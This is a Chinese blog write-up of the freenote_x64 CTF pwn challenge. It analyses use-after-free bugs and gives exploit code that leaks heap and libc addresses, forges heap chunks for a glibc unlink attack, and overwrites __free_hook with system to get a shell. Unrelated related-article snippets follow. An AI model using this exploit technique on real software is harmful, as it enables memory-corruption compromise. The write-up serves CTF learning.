unlink(freenote_x64)

最新推荐文章于 2025-04-09 10:43:49 发布
原创 最新推荐文章于 2025-04-09 10:43:49 发布 · 666 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #glibc

本文介绍了一种利用UAF漏洞的方法,通过精心构造的内存操作实现对内存的非法访问,进而泄露堆和库的地址,并最终获得shell权限。文章详细展示了如何通过删除和编辑操作伪造堆块,实现unlink漏洞触发。

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LUxec7QN-1648307049868)(unlink(freenote_x64)].assets/image-20220326225149078.png)

分析

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-17z0knM7-1648307049870)(unlink(freenote_x64)].assets/image-20220326225203435.png)

init_large_chunk

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KU8Yea1w-1648307049872)(unlink(freenote_x64)].assets/image-20220326225222819.png)

show

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P8dDyNOd-1648307049873)(unlink(freenote_x64)].assets/image-20220326225236394.png)

new

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tkvnccj8-1648307049874)(unlink(freenote_x64)].assets/image-20220326225248612.png)

edit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wYGi7kyC-1648307049875)(unlink(freenote_x64)].assets/image-20220326225300092.png)

dele

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ff2tAhcD-1648307049878)(unlink(freenote_x64)].assets/image-20220326225315281.png)

malloc有限制,大小只能为0x80的整数倍如0x80、0x100、0x180

edit有个realloc函数且带有uaf漏洞

dele函数也有uaf漏洞,当时没注意到!!!

因为dele函数有uaf所以realloc的uaf漏洞本exp没用到。。。。。。

思路

因为有uaf就可以很方便的泄漏heap地址和libc地址

add(0x80,'0') #0
add(0x80,'1') #0
add(0x80,'2') #0
add(0x80,'3') #0
dele(0)
dele(2)
add(8,'0'*8) #0
add(8,'2'*8) #0
show()
ru('0'*8)
heap = info(rc(4),'heap') - (0x12c7940-0x12c6000)
ru('2'*8)
libc.address = info(rc(6),'libc') -(0x7f64dfb65b78-0x7f64df7a1000)

再去掉所有的堆块,便于后面伪造堆块

dele(3)
dele(2)
dele(1)
dele(0)

然后通过edit函数一次性伪造全部堆块,再进行unlink操作

target = heap + 0x30
payload = p64(0) + p64(0x111) + p64(target - 0x18) + p64(target - 0x10)
add(len(payload),payload)

payload =  b'/bin/sh\x00' + b"A"*0x78  + p64(0x110) + p64(0x90) + b"B"*0x80
payload += p64(0) + p64(0x91) + b"C"*0x80
add(len(payload), payload)
dele(2)#unlink

getshell

payload = p64(1)*2  +  p64(8) + p64(libc.symbols['__free_hook'])
edit(0,len(payload),payload)

payload = p64(libc.symbols['system'])
edit(0,len(payload),payload)

截图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v0JUF1p6-1648307049879)(unlink(freenote_x64)].assets/image-20220326230021136.png)

jarvisoj_freenote_x64
seaaseesa的博客
04-17 482
jarvisoj_freenote_x64 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能清空了标记但是,没有清空指针,使得可以多次free。 由于清空了标记,因此这个UAF只能用来double free。 用于输入的函数会输完a2个字符为止,会将堆里的指针覆盖掉,因此也无法直接泄露地址。 由此想到的方法就是构造overlap chunk,我们注意...
0ctf freenote
MozhuCY的博客
09-21 754
整理结构体 程序首先初始化了了chunklist,此题的chunklist是在堆里面分配的 一个指针指向了malloc(0x1810)的头,此段空间的前16字节分别是最大堆块的值和当前堆块数量 大概结构体如下图 1 2 3 4 5 6 7 00000000 00000000 headptr struc ; (sizeof=0x1810, a...
0CTF 2015 FreeNote
Bill
04-25 1336
0CTF 2015 Freenote 序言 又一个Double Free类型的题, 虽说是Double Free, 但利用方式不一样, 有需要的看一下. 程序运行(简单运行) 1. MENU == 0ops Free Note == 1. List Note 2. New Note 3. Edit Note 4. Delete Note 5. Exit =======...
Linux 堆溢出之fastbin实例
M021的专栏
11-11 4096
Linux下堆溢出 fastbin实例
[pwn]堆:unlink绕过,0CTF2015 freenote详解
Breeze的博客
09-02 9506
[pwn]堆:2free=unlink绕过,0CTF2015 freenote 题目地址,提取码:f0xd 拿到题目,国际惯例,首先查看安全策略; 没有开启PIE和full partial。然后查看程序逻辑: 函数的名字已经被我改过了,比较常见的堆溢出漏洞的菜单和功能,值得一提的是init__函数(原来名字是啥我忘了): 申请了一大块地方,用来做记事本的索引。这个结构体在后面根据上下文可以...
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 780
这道题利用了unlinkunlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
jarvis level6_x64堆溢出unlink拾遗
weixin_30274627的博客
11-16 231
level6 32位的我没有调出来,貌似32位的堆结构和64位不太一样,嘤嘤嘤?,所以做了一下这个64位的,题目地址,level6_x64 首先看一下程序的结构体 struct list //0x1810 { int all=256; int now_sum; struct _note *note; } struct _note { ...
(jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 508
UnlinkUnlinkUnlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.youkuaiyun.com/weixin_41617275/article...
InvalidArchiveError ARNING conda.gateways.disk.delete:unlink_or_rename_to_trash(143): Could not rem
caigen0001的专栏
10-24 4095
InvalidArchiveError ARNING conda.gateways.disk.delete:unlink_or_rename_to_trash(143): Could not remove or rename
POSIX 消息队列:mq_close vs mq_unlink
m0_56508437的博客
04-09 1155
以(如 Linux 的实现)为例,释放消息队列的引用(mq_close)和清除消息队列(mq_unlink)是mq_close。
文件操作unlink()
m0_46376834的博客
07-29 338
之前,建议先确认是否需要删除该文件以及备份重要数据。函数删除的文件将无法恢复,请谨慎操作。表示要删除的文件的路径和名称。
Linux系统调用列表(CentOS7_X64
yetugeng的专栏
02-20 1873
以下的列表来源于64位的CentOS 7系统,详解链接后面会陆续补充。 系统中支持的系统调用列表及编号都定义在 /usr/include/asm/unistd.h文件下。 系统调用号 函数名 源代码 功能简介 起始内核版本 详解链接 0 read fs/read_write.c 读文件内容 ------ Linux...
Lua非空判断方法[源码]
11-24
本文详细介绍了在Lua中进行非空判断的几种方法,特别是针对table类型的变量。首先,文章指出了直接对nil值进行索引会导致异常的问题,并给出了一个简单的例子来说明如何避免这种情况。接着,文章讨论了如何判断一个table是否为空,指出不能简单地使用`#table == 0`的方式,而是应该使用`next(t) == nil`的方法。此外,文章还提到了`next`指令在LuaJIT中的优化问题,建议在非必要情况下少用。最后,文章简要介绍了如何判断一个字符串是否全部由空格组成,使用了正则匹配的方法。这些内容对于Lua开发者来说非常实用,能够帮助他们避免常见的错误。
JS表格转Excel实现[可运行源码]
11-24
该文章详细介绍了如何使用JavaScript将HTML表格数据导出为Excel文件。内容涵盖了针对不同浏览器的兼容性处理,包括IE和非IE浏览器的不同实现方式。对于IE浏览器,使用ActiveXObject进行导出;对于非IE浏览器,则通过base64编码和数据URI方案实现。文章还提供了完整的代码示例,包括表格数据的处理、格式化和导出功能,支持文本和图片类型的数据导出。
图片转bin文件存储[项目代码]
11-24
本文介绍了在OpenCV项目中如何将大量图片数据转换为二进制(bin)文件进行高效存储和读取的方法。作者在项目中遇到需要处理大量图片数据的问题,尝试了多种格式(如.mat、.txt、.yml)后发现效率较低。通过使用二进制文件存储,显著提升了读写速度。文章详细展示了使用OpenCV将图片写入二进制文件的代码示例,以及从二进制文件读取图片数据的实现方法。虽然该方法需要提前知道图片的尺寸和数量,但读写速度极快,适合处理大量图片数据。作者还提到可以通过换行符或终止符优化读取过程,但未深入探讨。
ROS视觉处理与色彩识别[项目源码]
11-24
本文详细介绍了在ROS环境下进行视觉处理的基础步骤,特别是针对色彩识别的实现方法。内容涵盖了从摄像头驱动的安装与配置(如usb_cam驱动和image_view工具的使用),到创建功能包和编写图像处理节点(包括RGB图像回调函数、HSV色彩空间转换、二值化处理及形态学操作)。此外,还演示了如何在仿真环境中获取图像,并通过OpenCV实现红色和绿色物体的识别与追踪。最后,文章提供了完整的代码示例和编译运行步骤,帮助读者快速上手ROS视觉处理项目。
Anaconda安装与使用指南[项目源码]
11-24
本文详细介绍了在Anaconda环境下安装和使用jupyter及numpy的步骤。首先,指导用户如何安装Anaconda并创建虚拟环境,然后详细说明了如何在虚拟环境中安装jupyter和numpy。接着,文章提供了多个numpy的练习示例,包括创建零向量、矩阵操作、归一化等。此外,还介绍了如何在Jupyter中完成numpy、pandas和matplotlib的例题,涵盖了从基础操作到实际应用的多个方面。最后,文章总结了实验过程中的经验,特别是在使用国内镜像源后下载速度的提升。
【动静障碍物】基于JPS算法(改进A)全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法(Matlab代码实现)
11-24
【动静障碍物】基于JPS算法(改进A)全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法(Matlab代码实现)内容概要:本文介绍了一种结合改进A*算法的JPS(跳跃点搜索)全局路径规划与DWA(动态窗口法)局部避障的混合控制算法,用于机器人在动静态障碍物环境下的自主导航。该算法通过JPS优化全局路径搜索效率,提升路径规划速度,并结合DWA实现实时动态避障,增强了机器人在复杂动态环境中的适应性和安全性。整个系统在Matlab平台上进行了代码实现与仿真验证,展示了良好的路径规划效果与避障性能。; 适合人群:具备一定机器人学、自动控制或路径规划基础知识的研究生、科研人员及从事智能机器人开发的工程技术人员。; 使用场景及目标:①应用于移动机器人在静态与动态障碍共存环境中的自主导航任务;②为研究高效全局规划与实时局部避障的融合策略提供技术参考与实现案例;③支持Matlab仿真环境下的算法验证与优化。; 阅读建议:建议读者结合Matlab代码深入理解JPS与DWA的集成逻辑,重点关注算法在路径最优性、计算效率与避障实时性之间的平衡设计,可进一步扩展至多机器人系统或复杂地形场景的应用研究。
Lua中loadstring应用[源码]
最新发布
11-24
本文介绍了在Lua编程中使用loadstring函数解析字符串公式的方法,特别是在游戏开发中的应用。通过示例代码展示了如何解析包含动态变量的字符串,如属性键、操作符和技能等级等,并动态计算其值。文章详细说明了如何利用loadstring将字符串转换为可执行的Lua代码,并处理复杂的公式解析,如计算buff持续时间和属性加成。这对于需要动态处理游戏内文本和公式的开发者具有实用价值。
unlink test_link
10-18
"unlink test_link" 这句话看起来像是在操作系统的命令行中尝试删除一个名为 "test_link" 的文件链接。在Unix或Linux系统中,`unlink` 是一个用于删除文件或符号链接的命令。如果你想了解这个操作的过程,比如它会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值